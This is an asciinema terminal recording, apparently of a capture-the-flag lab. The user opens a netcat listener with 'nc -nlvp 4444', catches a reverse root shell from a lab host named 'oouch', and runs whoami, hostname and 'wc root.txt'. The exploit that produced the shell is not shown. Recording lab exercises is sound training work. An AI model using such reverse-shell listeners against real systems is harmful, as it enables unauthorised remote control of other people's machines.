{"version": 2, "width": 150, "height": 34, "timestamp": 1584751047, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.152813, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                     \r \r"]
[0.154402, "o", "\u001b]2;root@parrot: /home/prashant\u0007\u001b]1;/home/prashant\u0007"]
[0.183894, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mprashant\u001b[00m \u001b[01;34mgit:(\u001b[31mmaster\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
[0.184032, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[1.989065, "o", "asciinema rec"]
[2.14837, "o", "\u001b[13Dexit         \u001b[9D"]
[2.300143, "o", "\b\b\b\bnc -nlvp 4444"]
[3.18776, "o", "\u001b[?1l\u001b>"]
[3.187882, "o", "\u001b[?2004l\r\r\n"]
[3.188645, "o", "\u001b]2;nc -nlvp 4444\u0007\u001b]1;nc\u0007"]
[3.191341, "o", "listening on [any] 4444 ...\r\n"]
[6.458654, "o", "connect to [10.10.15.39] from (UNKNOWN) [10.10.10.177] 46596\r\n"]
[6.459484, "o", "bash: cannot set terminal process group (2806): Inappropriate ioctl for device\r\nbash: no job control in this shell\r\nroot@oouch:/root# "]
[9.356122, "o", "w"]
[9.603184, "o", "h"]
[9.819446, "o", "o"]
[10.035479, "o", "a"]
[10.139333, "o", "m"]
[10.339607, "o", "i"]
[10.571686, "o", "\r\n"]
[10.822916, "o", "whoami\r\n"]
[11.076507, "o", "root\r\nroot@oouch:/root# "]
[12.355426, "o", "h"]
[12.667059, "o", "o"]
[12.859472, "o", "s"]
[13.139323, "o", "t"]
[13.475615, "o", "a"]
[14.02766, "o", "\b \b"]
[14.363471, "o", "n"]
[14.499515, "o", "a"]
[14.603477, "o", "m"]
[14.779539, "o", "e"]
[14.915641, "o", "\r\n"]
[15.246414, "o", "hostname\r\n"]
[15.530451, "o", "oouch\r\nroot@oouch:/root# "]
[16.923976, "o", "w"]
[17.21132, "o", "c"]
[17.363221, "o", " "]
[17.563485, "o", "r"]
[17.779516, "o", "o"]
[17.907393, "o", "o"]
[18.043322, "o", "t"]
[18.291445, "o", "."]
[18.667362, "o", "t"]
[18.803371, "o", "x"]
[18.883507, "o", "t"]
[19.259546, "o", "\r\n"]
[19.561371, "o", "wc root.txt\r\n"]
[19.852692, "o", " 1  1 33 root.txt\r\nroot@oouch:/root# "]
[21.564125, "o", "^C\r\n"]
[21.564761, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                     \r \r\u001b]2;root@parrot: /home/prashant\u0007\u001b]1;/home/prashant\u0007"]
[21.599595, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;31m➜  \u001b[36mprashant\u001b[00m \u001b[01;34mgit:(\u001b[31mmaster\u001b[34m) \u001b[33m✗\u001b[00m \u001b[K"]
[21.599916, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[21.957317, "o", "e"]
[22.195596, "o", "\bex"]
[22.331995, "o", "i"]
[22.476141, "o", "t"]
[22.572064, "o", "\u001b[?1l\u001b>"]
[22.572217, "o", "\u001b[?2004l\r\r\n"]
[22.572838, "o", "\u001b]2;exit\u0007"]
[22.577155, "o", "\u001b]1;exit\u0007"]
